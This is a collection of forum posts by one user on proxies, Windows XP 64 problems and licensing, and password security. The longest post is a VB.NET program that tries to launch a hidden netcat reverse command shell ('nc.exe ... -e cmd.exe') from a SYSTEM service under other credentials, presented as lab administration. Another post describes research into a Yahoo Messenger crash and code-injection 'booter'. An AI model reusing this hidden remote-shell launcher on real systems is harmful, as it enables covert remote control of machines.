tansqrx

I now have a 90% solution to my problem. The biggest problem was a lack of education on my end. I highly recommend SecurSurf to those who are very technically inclined but others may want to stay away. The system is very robust and has many possibilities.After almost giving I gave it one last try and downloaded Putty (http://www.chiark.greenend.org.uk/~sgtatham/putty/). Not expecting anything I loged in and to my amazement it worked. The welcome message had several hints and words of wisdom (and missing information). The main website did not list any of the ports that I could use but the welcome message had ports for Squid (http://www.squid-cache.org/), Squid + Proxivty, and Suqid + Tor. With this missing information I was able to set the appropriate rules and everything worked.My second problem was that Shareaza did not have proxy support. I soon found a program called Proxifier (http://www.proxifier.com/) which basically proxy enables any application. With a bit of tinkering I soon got the whole system up and running. I was still getting some DNS request and data leakage and I turned on a feature in Proxifier that took care of that problem. All together I am experiencing almost the same bandwidth as I was before. I have easily had speeds of 200Kb/sec+ which I could have never gotten with another service.I did say that this was a 90% solution. I am still having problems with some request leakage on UDP. I opened Ethereal and found some unencrypted UDP packets talking on the default Shareaza port. The leakage is minor, I would say less than 0.01% of traffic, but it is still a concern. I have other avenues that I will be exploring in the future so I will report on them as I find out more.P.S. Apparently the SecurSurf program is using plink.exe, one of the Putty applications. Depending on traffic load, plink.exe will decide to fail. This usually happens every two hours or so when traffic is heavy. I don’t know if this is a fault of SecurSurf or Putty. I am currently looking for another SSH port forwarding solution.

Can I clarify a few things?1) You are installing XP Home as your business machine. This is a personal business and you are not working in a corporate environment.2) This is a new key that has never been used.They first thing that popped into my head was that you got this license from your IT department but after rereading a few times I didn’t get that feeling any more. I have myself had a few problems in this situation. The IT person has bought lets say 20 keys in bulk. They keys go onto several computers, hardware gets changed, reinstalled, who knows what else and before you know it you are getting nasty messages for Microsoft even though you are 100% legal. I don’t know if this applies to you but you can call Microsoft and usually get this straightened out.I also have to ask how you got the key. If you opened the shrink wrapped package and are still having these problems then I would find a Microsoft person and yell at them until they sent me a new key. (I sometimes enjoy yelling at tech support people when they are clearly in the wrong and I have been ripped off. It releases the frustration of the problem and is somewhat of a therapy. If yelling does not work just ask for their supervisor. If that person is still a moron then ask for his supervisor.)If you got the key second hand then you might be out of luck. You never know what happened to the key before you got it. The previous owner may have given it to 10 of his closest friends and you were number 11. If this is the case you might have to bite the bullet and buy a new copy.

I recently purchased SecurSurf from SecurStar (http://www.securstar.com/products_ssolo.php). It is basically a secure proxy server that you use to make your internet traffic “anonymous”. I have gotten IE to work great but I am having problems getting any other applications running. It is a new product for SecurStar so the program they sent me is fairly immature. My main reason for purchasing was to get a P2P client called Shareaza running and so far I have had no luck. I have also tried a newsreader and several other programs with no luck also. Has anyone had any experience with this problem with either SecurSurf or Shareaza? Also SecurSurf works over SSH. Are there any other good programs that would let me use the SecurSurf server and be more user friendly?

Thanks Mark420 I will get on these right away.

I recently bought a Verizon Motorola Q. It runs Microsoft Mobile 5.0 for smartphones. If you are looking in to buying one I can’t really recommend it. Its does all the wiz bang stuff like surf the Internet and such but I have already found several bugs and in my option it run sluggish. My problem is I need to backup my contacts list. I installed Active Sync (which is also a Microsoft product) that came with the phone. While installing it said that I need Outlook before I could access the contact list. Of course I don’t have Outlook installed because I check all my mail using webmail and I find it to be quite the hassle when it is installed. Is there any other software that I can use to backup my contact list? Preferably free.

To my knowledge there is only one way to “hack” a Yahoo account and that is done by cracking. Simply put, an attacker tries a list of possible passwords (dictionary) until he finds the password. The sure fire way to avoid this type of attack is to use a password that is not a common word or even a word at all. Another downfall to this attack is Yahoo limits a user to how many times they can try a password before they get blocked (999 HTTP response header). One can possibly lengthen the search space by using proxies but this can become quite difficult very quickly.I am not trying to be harsh to your girlfriend but this time make sure she uses a secure password. This includes uppercase, lowercase, numbers, and special characters and is at least eight characters long. I highly doubt a cracker could get her password any other way. To validate my suspicions, ask her what her old password was.

Well I never did find a good answer to my .NET question. Apparently there are a whole lot of programmers with the exact same question. Personally I think Microsoft painted themselves into a bug corner.But I did get an answer and one that worked almost perfectly for me. I posted the same question to microsoft.public.dotnet.security and got one response (https://groups.google.com/forum/?hl=en%23!topic/microsoft.public.dotnet.security/TbANVbCRNDk). A very nice lady posted a link to an old project that she completed. The project is in C++ but at that point in time I would try anything. The only modification I had to do was to add code to hide the window when opened (STARTUP_INFO struct).I really liked the solution because of the –i option. It automatically finds out who the interactive user is and does all the dirty work for you. In the end I modified the hidden window problem and just used the program as is. I know you would like to hear of a definite answer but I saw the opportunity and simply used someone else’s hard work. I don’t think you will ever get this to work under the current .NET framework. If you really need this then I would write it as a dll in C++.

I finally bit the bullet and reinstalled plain XP. Now something else interesting happened. I never had a legit copy of XP before (I bought XP 64 intending to go legal). Now if you were in my position you know of those annoying little popup balloons in the system tray that basically tell you that you computer is screwed and you need to buy a copy from Microsoft. Being I was in a hurry to get my legit copy I said what the hell and purchased (Also it is a fairly good deal considering the same thing will cost you $250 at CompUSA).Now here is the kicker. After sending my credit card information, I received a mail that said it would take 10 days to process. 10 days? If I were purchasing a membership to a p0rn site I would be let in 30 seconds or less. Why does it take a huge company like Microsoft 10 days to process a credit card transaction?

I need to add DriveCrypt to the list of programs that do not work. Looks like any program that uses a low level device driver will not work.

I just got the parts for my new machine which is an AMD AM2 5000+ X2 64. I even broke down and purchased a nice brand new shinny copy of Windows XP 64 to go with the new machine. My problems started when I started loading program onto Windows. Apparently many of the programs that I not only like but are essential just do not work. The first problem was with Norton SystemWorks 2006. Although not essential, I did buy the copy for the expressed purpose of loading it on to this machine. I called Symantec and they flat out said XP 64 is not supported and I should ask for a refund. The next problem came with PGP Desktop and Whole Disk Encryption. This is yet another quite expensive piece of software that I do call essential. I am getting “The PGP memory locking feature is not functioning correctly...please reinstall”, “Can't start driver. File will not be wided on delete”, and “There is a problem establishing PGP whole disk detection of removable media. You will not be able to unlock removable media.” I also install several .NET programs that I had written myself and was unable to get them to work. Seeing this is how I make my living, this is definitely a deal breaker for me.I suppose my question is this. How many of you out there are using Windows XP 64 and have you had any of the similar problems that I have had. I am considering reinstalling the 32 bit version of XP but I will be losing some of the hardware functionality (I have 4 GB of RAM installed, as I understand, XP 32 only sees 3GB.) How much of a performance hit will I take by installing vanilla XP and is it wise to do so on a 64 bit processor?

These two methods appear to be quite abit of trouble and without any meaningful security. It might work OK for two pieces of p0rn but what happens when you get a collection of more than two works of “art”? Method two is easily defeated by unhidding hidden files (from explorer window, tools>folder options>view>show hidden files and folders). The problem with method one is that you can only have one file named HFF (255).As sparx suggested, encryption is much better and easier. By using a product such as TrueCrypt (free!) you can create a container and just store all of your information there. All you have to do is mount the partition and use it just like a hard drive. Very useful for an art collection consisting of more than one work.

From what I can understand, the Administrator account did not have the password set in the first place. Otherwise it would be trivial for anyone to break into a machine and I donât think even Microsoft would allow that. I myself have never heard of hitting F11 and I have been doing this for quite some time. There are other ways of at least resetting the Administrator password if you have physical access to the machine. http://forums.xisto.com/topic/8716-topic/?showtopic=8716=

Most of the research for these tutorials were created for a research paper that I wrote. It has been a few years ago now but I believe that this information is still relevant. The purpose of this paper was as follows: What is the communications protocol used by common booters? Is it possible to build my own booter program? What causes, at the machine level, the Yahoo! Messenger program to crash? Is it possible to inject arbitrary code using current booter technology?In the finial form of this paper I created my own booter program and investigated if it was possible to basically take over someone's computer by hitting them with a booter and injecting proper code into the attack. What follows is a description of my program and debugger outputs of the resulting boot code.

It appears that my specific problem with Hypercam has been resolved. Hyperionics, the maker of Hypercam apparently complained to Symantec about including Hypercam in their database of spyware. Looks like I wasnât the only one complaining about Symantecâs poor judgment on this one. You can refer to the rest of the article at http://forums.xisto.com/no_longer_exists/. This next part is to address the concerns of nightfox. There are several good reasons that I believe Hypercam is not a good tool to use by hackers. From my experience I have found that when a machine is compromised, the attacker is usually remote and has a command line to work with. If the attacker wants to monitor the activity on the victimâs machine then Hypercam would be the last thing to use. It is true that Hypercam can be setup to show no signs that it is running but none of those options could be used from a command line or added to a startup script. These options must be set in the GUI and then the Record button is pushed. An attacker would have to VNC into the machine and set all of this up without the user knowing which is quite unlikely. Additionally this would have to be performed every time the machine is rebooted which would raise the frustration of the attacker and his chance of being caught. Hypercam is also a commercial closed source program so there is no chance of an attacker modifying the source code and adding this functionality (which is a moot point because this in itself would change the program signature). There is also another possibility where this scenario has a higher probability of being executed and that is where the attacker has physical access to the machine. In this case I would think that Hypercam would be the least of the victimâs worries. Although this is most likely the best use of an attacker using Hypercam, moderate physical security should take care of this problem. In the end I believe that the benefits of Hypercam far outweigh possibility of an attacker using Hypercam. Certain safeguard already exist that prevent Hypercam being used in a stealthy way from a remote perspective. P.S. The reason I mentioned Windows Media Player as being spyware is that it constantly talks to the Internet while being used. It has the capability of doing such things as asking the Internet what the title of the mp3 that I am playing is and recommend stores for buying similar products. It also has the sometimes scary job of reporting usability data back to the mothership or asking unknown sources if it is OK to play content protected data. (heard of several horror stories where âcontent protectedâ music or movies turned out to be a virus or trojan). All of this adds up to make me deny WMP at the firewall and never let it talk to the Internet and thus I can somewhat consider it spyware.

I am having quite the time spawning a process under a different user context. My preferred method involves using the Windows API functions LogonUser() and CreateProcessAsUser() but I have not figured out a way to overcome several error messages. I also have the particular problem of running my program from the system account which I have found affects the behavior of CreateProcessAsUserW. Added to this toxic mix are several bugs scattered throughout the Windows API and .NET framework. After numerous attempts and about two weeks of frustrations I am open to suggestions. Background I am working on a side software project for my company that involves managing and administrating several computers in a lab. The project currently uses VB.NET 2005. One aspect of my project involves providing command line access from a lab computer to a central data collection computer. This functionality has already been accomplished by use of creating a service running under the SYSTEM account and netcat (http://netcat.sourceforge.net/). Basically what happens is when the lab computer is booted; a Windows service starts and creates a netcat session with the central computer. The central machine already has a netcat listener running so when the request comes in, an instant command prompt of the lab computer is given on the central machine. This solution has been thoroughly tested, signed off on, and works great so there can not be any changes to this part of the project. Here comes the problem. The netcat session is running under the context of SYSTEM, localsystem, or NT Authority. As some of you may know, the SYSTEM account is noninteractive and does not have access to the default desktop. Letâs take for example you wanted to start Notepad from this session. Enter the command and nothing happens. This is because SYSTEM can not access WINSTA0 and no commands with graphics or forms can be run. The next phase of our project involves running interactive programs on the desktop of any user that happens to be logged in (and perhaps those who are not). From experiments I have found that a netcat session running under the currently logged in user is able to run all GUI programs. My dilemma is creating a program that can be run under the SYSTEM service and launch a program or another netcat session with alternate credentials. As a side note, Microsoft does provide a well know utility called runas. This is of course what I would use but I have found that it will not work under a netcat session. After entering the command, the password is never asked for and it dumps me right back to the prompt. I have also tried several other third-party runas utilities such as sanur and CPAU but none of them works either. Requirements 1. Parent process running under SYSTEM context from Windows service. 2. Child process must run under alternate credentials and be able to launch a GUI application or another netcat instance. 3. Child process window must have the ability to start without a window. 4. Run under Windows XP SP2. 5. Child process should have access to the default desktop. 6. Program written in VB.NET, .NET framework 2.0. Desired but I will take anything in .NET (C#), C++, or C Methods Over the course of several weeks I have tried many different things. Here is what I have gone through. Method 1 - .NET Process Class This is the simplest way to create another process. This is not meant to create a process under another user but more of a reality check. Some interesting points are found by running the program under both a normal account (running straight from Visual Studio IDE) and the SYSTEM account. Under a normal account a DOS window briefly flashes and the program runs as expected. This is still a bug as the CreateNoWindow property is set to True and a window is still created. Under the SYSTEM account the same program starts a netcat session but never connects to the listener. Problem: No alternate credentials Method 2 - .NET Process Class Using Username, Domain, and Password .NET 2.0 added a new feature to the framework that allows programmers to spawn a process all within .NET. Just one problem, there is a bigger bug. Even if the CreateNoWindow property is set to True, a window is still created and this time it stays maximized. Under the SYSTEM account an exception is thrown âSystem.ComponentModel.Win32Exception: Access is denied.â According to MSDN (https://msdn.microsoft.com/en-us/library/system.diagnostics.process.startinfo.aspx), System.Diagnostics.Process is just a wrapper for the CreateProcessWithLogonW API. As I will explain later this presents its own problems. Microsoft also mentions that even though WindowStyle=hidden and CreateNoWindow=True, a window will still be created. I have seen in other articles that this is not intentional but a bug. Problem: Exception thrown, Window in normal account. Method 3 - Windows API LogonUser and CreateProcessAsUser From everything I have read this should be the one that works no matter what but alas it does not. My primary guide to this method is by K. Scott Allen (http://odetocode.com/blogs/scott/archive/2004/10/28/createprocessasuser.aspx). This method uses two API functions, LogonUser and CreateProcessAsUser. LogonUser acquires a security token from the kernel. That token is then passed to CreateProcessAsUser along with what program and arguments to run. Under a normal account I get a 1314 - ERROR_PRIVILEGE_NOT_HELD (https://msdn.microsoft.com/library?url=/library/en-us/debug/base/system_error_codes__1300-1699_.asp) when CreateProcessAsUser is called. When running under SYSTEM I get 1307 - ERROR_INVALID_OWNER when CreateProcessAsUser is called. Problem: 1307 under SYSTEM, 1314 under normal account. Method 4 - Windows API LogonUser, DuplicateTokenEx, and CreateProcessAsUser This is a slight change from method 3 as DuplicateTokenEx is added and is still the front runner for a finial solution. DuplicateTokenEx transforms the token retrieved from LogonUser into a primary token. Once again a 1314 is thrown under a normal account. Under the SYSTEM account a 1004 - ERROR_INVALID_FLAGS error is thrown on DuplicateTokenEx and 1307 is thrown on CreateProcessAsUser. A few interesting problems pop up when using this solution. For one, the command to launch can be passed two different ways, through lpApplicationName or lpCommandLine. MSDN says that lpApplicationName can be used to pass the command name and lpCommandLine for the arguments. You can also set lpApplicationName to nothing and pass both the command and arguments through lpCommandLine. I have tried both methods and I have not found any combination that works. Under certain variations I also get a 2 - ERROR_FILE_NOT_FOUND / 5 - ERROR_ACCESS_DENIED on LogonUser and 2 - ERROR_FILE_NOT_FOUND for CreateProcessAsUser. I have also used a known good application (notepad) and location to add to the mix and confirm the results. Once again according to MSDN documentation (https://support.microsoft.com/en-us/kb/285879) certain permissions must be set for both the calling account and alternate account. When running under SYSTEM, the calling account should have all permissions as it is the OS. Also the alternate account should have all the desired permissions because MAXIMUM_ALLOWED is set in DuplicateTokenEx. Perhaps there is another API that I must call to set these but I have not found one yet. Also there might be an API that could check the permissions? Problem: 1004, 1307, 2 under SYSTEM, 1314, 2, 5 under normal account. Method 5 - Windows API LogonUser, DuplicateTokenEx, and CreateProcessAsUserW This is the same as method 4 but uses the Unicode version of CreateProcessAsUser. I have read in several forums that this will solve the problem under Windows XP. A normal account produces a 2 - ERROR_FILE_NOT_FOUND under CreateProcessAsUserW. Under SYSTEM 1004 is thrown for DuplicateTokenEx and 2 for CreateProcessAsUser. Additionally 123 - ERROR_INVALID_NAME is thrown in some variations. Problem: 1004, 2 under SYSTEM, 2, 5 under normal account. Method 6 - Windows API CreateProcessWithLogonW This API function is new 2000, XP, and 2003 Server and combines the functions of LogonUser and CreateProcessAsUserW. From many forums, many users accomplished their goals by using CreateProcessWithLogonW. A caveat of CreateProcessWithLogonW is that it canât be called from the SYSTEM account according to the MSDN documentation (https://msdn.microsoft.com/library?url=/library/en-us/dllproc/base/createprocesswithlogonw.asp) which defeats the purpose of my program. Under a normal account, the program almost makes due. A window is created (which I think I can fix by tweaking one of the lpStartupInfo properties) and a nonfatal 203 - ERROR_ENVVAR_NOT_FOUND error thrown, but it does run. Under SYSTEM a 203 is thrown but nothing happens. Problem: CreateProcessWithLogonW will not run under SYSTEM account Method 7 â The Kitchen Sink I have seen many different variations on method 4 floating around out on the Internet. This is my attempt to throw everything at the wall and see what sticks. GetProcessWindowStation, OpenWindowStation, SetProcessWindowStation, and OpenDesktop have been added to the mix. The bottom line is CreateProcessAsUser is throws a 1314 error and GetProcessWindowStation throws a 5 - ERROR_ACCESS_DENIED. Under the normal account. Under SYSTEM GetProcessWindowStation throws a 2 - ERROR_FILE_NOT_FOUND and a 1307 for CreateProcessAsUser. Problem: 2, 1307 under SYSTEM, 5, 1314 under normal account. Method 7 â .NET Impersionation I quickly saw that this was not going to work. You can set a section of code to run under differed credentials but you can not start a new process under different credentials. I figured I would just throw this one in for completeness. Problem: No alternate credentials Possible Fixes? ⢠Perhaps the command to be processed is not formatted correctly. I have also tried a known good application (notepad) and usually get the same results. ⢠Additional permissions must be added to the account but I donât know what the API would be to do this. ⢠Additional APIâs needed? Conclusion It appears that everything was OK in Microsoft land until SP2 and Windows 2003 hit the market. Apparently Microsoft purposely sabotaged some of their APIâs so that you can not easily spawn a process with alternate credentials from the SYSTEM account. There has to be a way of doing this, surely Microsoft didnât paint themselves into a corner on this one. What happens if the OS wants to create a process under a different user (such as when a service is started under an account)? Sorry for such a long article but I wanted to show how completely I have researched this problem. Any constructive suggestions are welcomed with open arms and if you have a working example then I will be your new best friend. Code is provided below. I did not run each method concurrently, I simply commented out methods and tested one at a time. You may get 6 - ERROR_INVALID_HANDLE if LogonUser is called more than once. You will have to replace user/pass where needed. Full Project: http://forums.xisto.com/no_longer_exists/ Code Option Strict OnOption Explicit OnImports SystemImports System.Runtime.InteropServicesImports System.Security.PrincipalImports System.Security.PermissionsImports System.Threading<Assembly: SecurityPermissionAttribute(SecurityAction.RequestMinimum, UnmanagedCode:=True), _Assembly: PermissionSetAttribute(SecurityAction.RequestMinimum, Name:="FullTrust")> Module raex Dim strUser As String = Nothing Dim strPassword As String = Nothing Dim strServer As String = "192.168.1.109" Dim strPort As String = "2000" Dim strApplication As String = Nothing#Region "Const" Const LOGON32_LOGON_INTERACTIVE As Integer = 2 Const LOGON32_PROVIDER_DEFAULT As Integer = 0 Const WINSTA_ALL_ACCESS As Integer = &H37F Const READ_CONTROL As Integer = &H20000 Const WRITE_DAC As Integer = &H40000 Const DESKTOP_WRITEOBJECTS As Integer = &H80 Const DESKTOP_READOBJECTS As Integer = &H1 Const GENERIC_ALL As Integer = &H10000000 Const MAXIMUM_ALLOWED As Integer = &H2000000 Const SECURITY_IMPERSONATION As Integer = 2 Const TOKEN_PRIMARY As Integer = 1 Const LOGON_NETCREDENTIALS_ONLY As Integer = &H1& Const CREATE_DEFAULT_ERROR_MODE As Integer = &H4000000#End Region#Region "Structures" Public Structure PROCESS_INFO Public hProcess As IntPtr Public hThread As IntPtr Public dwProcessId As Integer Public dwThreadId As Integer End Structure Public Structure STARTUP_INFO Public cb As Integer Public lpReserved As Integer <MarshalAs(UnmanagedType.LPTStr)> Public lpDesktop As String <MarshalAs(UnmanagedType.LPTStr)> Public lpTitle As String Public dwX As Long Public dwY As Integer Public dwXSize As Integer Public dwYSize As Integer Public dwXCountChars As Integer Public dwYCountChars As Integer Public dwFillAttribute As Integer Public dwFlags As Integer Public wShowWindow As Short Public cbReserved2 As Short Public lpReserved2 As Integer Public hStdInput As Integer Public hStdOutput As Integer Public hStdError As Integer End Structure Public Structure SECURITY_ATTRIBUTES Public nLength As Integer Public lpSecurityDescriptor As IntPtr Public bInheritHandle As Boolean End Structure#End Region#Region "API Imports" <DllImport("C:\\Windows\\System32\\advapi32.dll")> _ Public Function CreateProcessWithLogonW(<MarshalAs(UnmanagedType.LPWStr)> ByVal lpUsername As String, _ <MarshalAs(UnmanagedType.LPWStr)> ByVal lpDomain As String, _ <MarshalAs(UnmanagedType.LPWStr)> ByVal lpPassword As String, _ ByVal dwLogonFlags As Integer, _ <MarshalAs(UnmanagedType.LPWStr)> ByVal lpApplicationName As String, _ <MarshalAs(UnmanagedType.LPWStr)> ByVal lpCommandLine As String, _ ByVal lpCreationFlags As Integer, _ ByVal lpVoid As Integer, _ <MarshalAs(UnmanagedType.LPWStr)> ByVal lpCurrentDirectory As String, _ ByRef lpStartupInfo As STARTUP_INFO, _ ByRef lpProcessInfo As PROCESS_INFO) As Integer End Function <DllImport("C:\\Windows\\System32\\advapi32.dll")> _Public Function LogonUser(ByVal lpUsername As String, _ ByVal lpDomain As String, _ ByVal lpPassword As String, _ ByVal dwLogonType As Integer, _ ByVal dwLogonProvider As Integer, _ ByRef pToken As IntPtr) As Boolean End Function <DllImport("C:\\Windows\\System32\\user32.dll", SetLastError:=True)> _Public Function GetProcessWindowStation() As IntPtr End Function <DllImport("C:\\Windows\\System32\\user32.dll", SetLastError:=True)> _Public Function OpenWindowStation(ByVal lpszWinSta As String, _ ByVal fInherit As Boolean, _ ByVal dwDesiredAccess As UInteger) As IntPtr End Function <DllImport("C:\\Windows\\System32\\user32.dll", SetLastError:=True)> _Public Function SetProcessWindowStation(ByVal hWinSta As IntPtr) As Boolean End Function <DllImport("C:\\Windows\\System32\\user32.dll", SetLastError:=True)> _Public Function OpenDesktop(ByVal lpszDesktop As String, _ ByVal dwFlags As Integer, _ ByVal fInherit As Boolean, _ ByVal dwDesiredAccess As UInteger) As IntPtr End Function <DllImport("C:\\Windows\\System32\\advapi32.dll", SetLastError:=True)> _Public Function ImpersonateLoggedOnUser(ByVal hToken As IntPtr) As Boolean End Function <DllImport("C:\\Windows\\System32\\advapi32.dll", SetLastError:=True)> _Public Function CreateProcessAsUser(ByVal pToken As IntPtr, _ ByVal lpApplicationName As String, _ ByRef lpCommandLine As String, _ ByRef lpProcessAttributes As SECURITY_ATTRIBUTES, _ ByRef lpThreadAttributes As SECURITY_ATTRIBUTES, _ ByVal bInheritHandles As Boolean, _ ByVal dwCreationFlags As Integer, _ ByRef lpEnvironment As IntPtr, _ ByVal lpCurrentDirectory As String, _ ByRef lpStartupInfo As STARTUP_INFO, _ ByRef lpProcessInfo As PROCESS_INFO) As Boolean End Function <DllImport("C:\\Windows\\System32\\advapi32.dll", SetLastError:=True)> _Public Function CreateProcessAsUserW(ByVal pToken As IntPtr, _ ByVal lpApplicationName As String, _ ByRef lpCommandLine As String, _ ByRef lpProcessAttributes As SECURITY_ATTRIBUTES, _ ByRef lpThreadAttributes As SECURITY_ATTRIBUTES, _ ByVal bInheritHandles As Boolean, _ ByVal dwCreationFlags As Integer, _ ByRef lpEnvironment As IntPtr, _ ByVal lpCurrentDirectory As String, _ ByRef lpStartupInfo As STARTUP_INFO, _ ByRef lpProcessInfo As PROCESS_INFO) As Boolean End Function <DllImport("C:\\Windows\\System32\\advapi32.dll", SetLastError:=True)> _Public Function DuplicateTokenEx(ByVal hExistingToken As IntPtr, _ ByVal dwDesiredAccess As UInteger, _ ByRef lpTokenAttributes As SECURITY_ATTRIBUTES, _ ByVal ImpersonationLevel As Integer, _ ByVal TokenType As Integer, _ ByRef phNewToken As IntPtr) As Boolean End Function#End Region <PermissionSetAttribute(SecurityAction.Demand, Name:="FullTrust")> _ Sub Main() Try Dim bReturn As Boolean Dim strNC As String = System.Environment.CurrentDirectory + "\nc.exe " Dim strNCArgs As String = strServer + " " + strPort + " -e cmd.exe" Dim strNotepad As String = "c:\windows\notepad.exe" 'token returned from LogonUser and CreateProcessAsUser Dim pUserToken As IntPtr = IntPtr.Zero 'Security attributes struct Dim pSecurityAttributes As SECURITY_ATTRIBUTES pSecurityAttributes.bInheritHandle = True pSecurityAttributes.nLength = Marshal.SizeOf(pSecurityAttributes) pSecurityAttributes.lpSecurityDescriptor = IntPtr.Zero 'Start information struct Dim pStartInfo As STARTUP_INFO = Nothing pStartInfo.cb = Len(pStartInfo) pStartInfo.lpTitle = "" pStartInfo.dwFlags = 0& pStartInfo.lpDesktop = "winsta0\default" 'Process information struct Dim pProcessInfo As PROCESS_INFO 'Enviroment variable Dim pEnviroment As IntPtr = IntPtr.Zero 'Method 1 - Use the built in .NET process class no user startProcessNoUser() 'method 2 - .NET with new 2.0 user and password startProcess() 'method 3 - Windows API LogonUser and CreateProcessAsUser bReturn = LogonUser("U3er", ".", "Pa33Word", LOGON32_LOGON_INTERACTIVE, LOGON32_PROVIDER_DEFAULT, pUserToken) System.Console.WriteLine("Method 3 LogonUser - " + CStr(Marshal.GetLastWin32Error())) bReturn = CreateProcessAsUser(pUserToken, System.Environment.CurrentDirectory + "\nc.exe", strServer + " " + strPort + " -e cmd.exe", Nothing, Nothing, False, 0, Nothing, System.Environment.CurrentDirectory, pStartInfo, pProcessInfo) System.Console.WriteLine("Method 3 CreateProcessAsUser - " + CStr(Marshal.GetLastWin32Error())) System.Console.WriteLine() 'Method 4 - Same as 3 but add DuplicateTokenEx after LogonUser 'Primary token Dim DupedToken As IntPtr = IntPtr.Zero bReturn = LogonUser("U3er", ".", "Pa33Word", LOGON32_LOGON_INTERACTIVE, LOGON32_PROVIDER_DEFAULT, pUserToken) System.Console.WriteLine("Method 4 LogonUser - " + CStr(Marshal.GetLastWin32Error())) bReturn = DuplicateTokenEx(pUserToken, MAXIMUM_ALLOWED, pSecurityAttributes, SECURITY_IMPERSONATION, TOKEN_PRIMARY, DupedToken) System.Console.WriteLine("Method 4 DuplicateTokenEx - " + CStr(Marshal.GetLastWin32Error())) bReturn = CreateProcessAsUser(pUserToken, strNC, strNCArgs, pSecurityAttributes, pSecurityAttributes, False, 0, Nothing, System.Environment.CurrentDirectory, pStartInfo, pProcessInfo) System.Console.WriteLine("Method 4 CreateProcessAsUser - " + CStr(Marshal.GetLastWin32Error())) System.Console.WriteLine() 'Method 5 - Same as 4 but use the unicode version of CreateProcessAsUser (CreateProcessAsUserW) bReturn = LogonUser("U3er", ".", "Pa33Word", LOGON32_LOGON_INTERACTIVE, LOGON32_PROVIDER_DEFAULT, pUserToken) System.Console.WriteLine("Method 5 LogonUser - " + CStr(Marshal.GetLastWin32Error())) bReturn = DuplicateTokenEx(pUserToken, MAXIMUM_ALLOWED, pSecurityAttributes, SECURITY_IMPERSONATION, TOKEN_PRIMARY, DupedToken) System.Console.WriteLine("Method 5 DuplicateTokenEx - " + CStr(Marshal.GetLastWin32Error())) bReturn = CreateProcessAsUserW(pUserToken, strNC, strNCArgs, pSecurityAttributes, pSecurityAttributes, False, 0, Nothing, System.Environment.CurrentDirectory, pStartInfo, pProcessInfo) System.Console.WriteLine("Method 5 CreateProcessAsUserW - " + CStr(Marshal.GetLastWin32Error())) System.Console.WriteLine() 'Method 6 - Use the API CreateProcessWithLogonW Dim iReturn As Integer iReturn = CreateProcessWithLogonW("U3er", System.Environment.MachineName, "Pa33Word", LOGON_NETCREDENTIALS_ONLY, Nothing, System.Environment.CurrentDirectory + strNC + " " + strNCArgs, CREATE_DEFAULT_ERROR_MODE, Nothing, System.Environment.CurrentDirectory, pStartInfo, pProcessInfo) System.Console.WriteLine("Method 6 CreateProcessWithLogonW - " + CStr(Marshal.GetLastWin32Error())) System.Console.WriteLine() 'Method 7 - APIs with everything but the kitchen thrown in Dim hwinstaSave As IntPtr Dim hwinsta As IntPtr Dim hdesk As IntPtr hwinstaSave = GetProcessWindowStation() System.Console.WriteLine("Method 7 GetProcessWindowStation - " + CStr(Marshal.GetLastWin32Error())) hwinsta = OpenWindowStation("winsta0", False, WINSTA_ALL_ACCESS) System.Console.WriteLine("Method 7 OpenWindowStation - " + CStr(Marshal.GetLastWin32Error())) SetProcessWindowStation(hwinsta) System.Console.WriteLine("Method 7 SetProcessWindowStation - " + CStr(Marshal.GetLastWin32Error())) hdesk = OpenDesktop("default", 0, False, READ_CONTROL And WRITE_DAC And DESKTOP_WRITEOBJECTS And DESKTOP_READOBJECTS) System.Console.WriteLine("Method 7 OpenDesktop - " + CStr(Marshal.GetLastWin32Error())) SetProcessWindowStation(hwinstaSave) System.Console.WriteLine("Method 7 SetProcessWindowStation - " + CStr(Marshal.GetLastWin32Error())) 'use method 4 bReturn = LogonUser("U3er", ".", "Pa33Word", LOGON32_LOGON_INTERACTIVE, LOGON32_PROVIDER_DEFAULT, pUserToken) System.Console.WriteLine("Method 7 LogonUser - " + CStr(Marshal.GetLastWin32Error())) bReturn = DuplicateTokenEx(pUserToken, MAXIMUM_ALLOWED, pSecurityAttributes, SECURITY_IMPERSONATION, TOKEN_PRIMARY, DupedToken) System.Console.WriteLine("Method 7 DuplicateTokenEx - " + CStr(Marshal.GetLastWin32Error())) bReturn = CreateProcessAsUser(pUserToken, strNC, strNCArgs, Nothing, Nothing, False, 0, Nothing, System.Environment.CurrentDirectory, pStartInfo, pProcessInfo) System.Console.WriteLine("Method 7 CreateProcessAsUser - " + CStr(Marshal.GetLastWin32Error())) System.Console.WriteLine() 'Method 8 - Use some crazy ideas from .NET to set impersonation 'get token from LogonUser API bReturn = LogonUser("U3er", ".", "Pa33Word", LOGON32_LOGON_INTERACTIVE, LOGON32_PROVIDER_DEFAULT, pUserToken) System.Console.WriteLine("Method 8 LogonUser - " + CStr(Marshal.GetLastWin32Error())) Dim newId As New WindowsIdentity(pUserToken) Dim impersonatedUser As WindowsImpersonationContext = newId.Impersonate() 'Use method 1 startProcessNoUser() Console.ReadKey() Catch ex As Exception Console.WriteLine(" Exception thrown " + ex.ToString) End Try End Sub Public Sub startProcessNoUser() Try Dim p As New Process p.StartInfo.Arguments = strServer + " " + strPort + " -e cmd.exe" p.StartInfo.CreateNoWindow = True p.StartInfo.ErrorDialog = False p.StartInfo.FileName = System.Environment.CurrentDirectory + "\nc.exe" p.StartInfo.UseShellExecute = False p.StartInfo.WindowStyle = ProcessWindowStyle.Hidden p.StartInfo.RedirectStandardOutput = True Console.WriteLine("Method 1 .NET No User - Command: " + p.StartInfo.FileName + " " + p.StartInfo.Arguments) p.Start() Catch ex As Exception Console.WriteLine(ex.ToString) End Try End Sub Public Sub startProcess() Try Dim p As New Process p.StartInfo.UserName = "U3er" Dim ssPass As New System.Security.SecureString Dim c As Char For Each c In "Pa33Word" ssPass.AppendChar(c) Next p.StartInfo.Password = ssPass p.StartInfo.Domain = System.Environment.MachineName p.StartInfo.Arguments = strServer + " " + strPort + " -e cmd.exe" p.StartInfo.CreateNoWindow = True p.StartInfo.ErrorDialog = False p.StartInfo.FileName = System.Environment.CurrentDirectory + "\nc.exe" p.StartInfo.UseShellExecute = False p.StartInfo.WindowStyle = ProcessWindowStyle.Hidden p.StartInfo.RedirectStandardOutput = True Console.WriteLine("Method 1 .NET No User - User: " + p.StartInfo.Domain + "\" + p.StartInfo.UserName + " Command: " + p.StartInfo.FileName + " " + p.StartInfo.Arguments) p.Start() Catch ex As Exception Console.WriteLine(ex.ToString) End Try End SubEnd Module

This is quite interesting. I was listening to the Security Now! Podcast hosted by Steve Gibson and he said that he and most high level security experts did not run any AV programs. Steve is more known for running the shields-up service at https://www.grc.com/intro.htm.

